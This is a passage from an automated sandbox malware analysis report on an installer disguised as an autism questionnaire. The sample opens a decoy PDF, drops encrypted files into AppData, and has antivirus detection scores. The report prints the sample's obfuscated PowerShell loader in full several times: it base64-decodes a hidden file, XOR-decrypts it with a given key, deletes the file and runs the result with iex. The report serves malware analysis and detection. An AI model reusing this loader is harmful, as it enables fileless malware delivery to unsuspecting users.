            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\lzQLsCuXKpNJRnD.EYoPxpsTGlaKum entropy: 7.99690368833Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\VDWdfjnwIM.QtgAySoCKculLD entropy: 7.99739900793Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\KlwmIpaSTYyehqr.hPOZxTsGbfiX entropy: 7.99833075606Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\hTUVAtmiEMuF.YbrcRuktOoLFJP entropy: 7.99823608681Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\iVXufIvLOZxz.WslqdKgXMEPjmJUr entropy: 7.99820308977Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\QSGbAcBYTIxyp.XuYMCakdHx entropy: 7.99649669189Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\xoqRJdvTuIDia.kZDCejbWsJfd entropy: 7.99783835346Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\dbhYTxgcwOknlfLPy.dXWZOzuyEncBiKgphl entropy: 7.99885929887Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\JpdPkirxXzA.dUxbTghEqwLZHrPSyOF entropy: 7.99758686906Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\VaRltDUbPMkAJw.kSNCiwQBaoM entropy: 7.99866082753Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\bOGjhazSdBHTmZPLYvo.gYwXFeuJSZVbQN entropy: 7.99825301072Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\QpJOjRaPitKZ.PtKJpRLHWn entropy: 7.99919036917Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\jHcXtlGToOPIg.RlFEhukcNHqfrC entropy: 7.99661057604Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\WGTRFqeaJP.ibaGvCehnSkqQI entropy: 7.997957423Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\pWNJaOkLEPTitoZQxh.dhekgZDquCEOGo entropy: 7.99691416027Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\BrWsxmwzXtq.boMtkvBjOGhViaZIu entropy: 7.9988519022Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\gPuVCxOZRGK.ClFrGdavymeOAWxn entropy: 7.99699247406Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\McUgHjwPpkTros.FiVAMbepdtvDT entropy: 7.99875919745Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\DpZKQEkjnlPFUbgiSc.RVnKibmNahLBUCAOXP entropy: 7.99850851926Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\ASsgpFIMVt.xMedSYgIBHG entropy: 7.99878449731Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\mYSrPVTEqWZeX.EgMFikpUrCjD entropy: 7.99890602569Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\YNTcqzPgVesCmlJHUdr.DOsNBcQkFwW entropy: 7.99911647283Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\iHJKhyYvFeCVZk.uXIYCDmqFBMdlQiwv entropy: 7.99769379945Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\BsXTWhuOSKlUJidkM.OFiACTthuEWcHqNsUM entropy: 7.99857550682Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\EVZRsKUiwlqh.uShGkIVfog entropy: 7.99871101864Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\kKAvInrXuSO.zTWZlgovnHhuI entropy: 7.9985661784Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\mAaRvDrSculntQg.MCLcbUpOkDw entropy: 7.99880473155Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\xBqjVEPYeTa.VjJmMgSUwYnd entropy: 7.99828242735Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\okefTKFcPy.FKBGwpZmnRYoSeJz entropy: 7.99805802519Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\MRNJVswYOBZSUrvGz.nZMvFOCfHi entropy: 7.99904685563Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\wzZdaiABbDLUlNO.hqALkorUdFiNGXQYV entropy: 7.9989373373Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\XjDcKESNRldofOIr.IBHmlCxheODv entropy: 7.99795694054Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\txADckwQGJHK.IxuVkzFSstYXMP entropy: 7.99746602302Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\BSCWZeibkUap.kNyGvUKVWROLg entropy: 7.99909925709Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\EiRchpfIFtKU.chewIUsPOzbuYQNk entropy: 7.99890013737Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\qyruEKPUAcSLR.EFYWjJiwvkycQfogCs entropy: 7.99893112438Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\lGMphzrcTveNIbnSDuB.lXxNBiIAcT entropy: 7.99812739702Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\QWxiIaLeDJzmp.bXhgzQZDBsjdVLyaIOT entropy: 7.9973098337Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\DteYiQCzsmBdLVXjSo.eZRFsEoJXSwgAf entropy: 7.9982695023Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\gvXqMJDhSkw.kZCiLuxnrPHTsJM entropy: 7.99884654258Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\tQjgMbNFVwAfEpvBK.NrIzOdGfyRFuiWD entropy: 7.99844614872Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\GFNDrRJQMepgqul.keibGwgVIQvusja entropy: 7.99902024721Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\qTrZObDhSCYGyzc.EALtUnXeoquvzOQH entropy: 7.99718549081Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\FsWrRkPyOwJoMfluUn.JYVOCsvNtXxpBEU entropy: 7.99882826509Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\uDCtRUzOGL.UwWJgYkjAFebtZL entropy: 7.99913359309Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\AOiWkhKTEUaSxqPJryR.SPWQXkCAMyTmhGzuqt entropy: 7.99899100682Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\bkcEOMPgNlCfo.hHZWmwSbiN entropy: 7.99763098426Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\OWbwoVzjxLNB.IjCdUZyGoOJmRuXAbt entropy: 7.99777290932Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\cPmAHLlBJEfYonRFqTd.mbFdJIQypO entropy: 7.99896027266Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\UAnjRPwBSVcJvoyZOh.FOqQEDdkfmpu entropy: 7.998904439Jump to dropped file

            System Summary:

            barindex
            Initial sample is a PE file and has a suspicious nameShow sources
            Source: initial sampleStatic PE information: Filename: Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI, RELOCS_STRIPPED
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_004AF110 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_004AF110
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpCode function: 3_2_0060F6D8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,3_2_0060F6D8
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_004323DC0_2_004323DC
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_004255DC0_2_004255DC
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_0040E9C40_2_0040E9C4
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpCode function: 3_2_006B786C3_2_006B786C
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpCode function: 3_2_0040C9383_2_0040C938
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0102C9A812_2_0102C9A8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0102EA2812_2_0102EA28
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_073A294012_2_073A2940
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_073A765812_2_073A7658
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_073A040012_2_073A0400
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_073A044D12_2_073A044D
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_073ACDE812_2_073ACDE8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_073AB21012_2_073AB210
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_073ACDE812_2_073ACDE8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_073ACDD812_2_073ACDD8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_073A294012_2_073A2940
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_073B7FF012_2_073B7FF0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_073BDC3312_2_073BDC33
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_073B19C012_2_073B19C0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_073B78B812_2_073B78B8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_073BD75012_2_073BD750
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_073BED3012_2_073BED30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_073B143812_2_073B1438
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_073B2B8012_2_073B2B80
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_073BBA8812_2_073BBA88
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_073B218812_2_073B2188
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_073A764912_2_073A7649
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_037D2F2014_2_037D2F20
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_037D769814_2_037D7698
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_037D768A14_2_037D768A
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_037DAF9014_2_037DAF90
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_037DAF8114_2_037DAF81
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpCode function: String function: 005F5C7C appears 50 times
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpCode function: String function: 005F5F60 appears 62 times
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpCode function: String function: 005DE888 appears 40 times
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe, 00000000.00000003.342303509.00000000022E8000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamekernel32j% vs Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe, 00000000.00000000.281569295.00000000004C6000.00000002.00020000.sdmpBinary or memory string: OriginalFileName vs Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe, 00000000.00000003.282256431.0000000002520000.00000004.00000001.sdmpBinary or memory string: OriginalFileName vs Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe, 00000000.00000003.282523000.000000007FB50000.00000004.00000001.sdmpBinary or memory string: OriginalFileName vs Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeBinary or memory string: OriginalFileName vs Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeStatic PE information: invalid certificate
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeVirustotal: Detection: 35%
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeMetadefender: Detection: 20%
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeReversingLabs: Detection: 35%
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeFile read: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeJump to behavior
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe "C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe"
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeProcess created: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp "C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp" /SL5="$1D025E,102634141,825344,C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe"
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\user\AppData\Roaming\736c2da134b4beaabac45d01943b266e.pdf
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" --type=renderer /prefetch:1 "C:\Users\user\AppData\Roaming\736c2da134b4beaabac45d01943b266e.pdf
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;
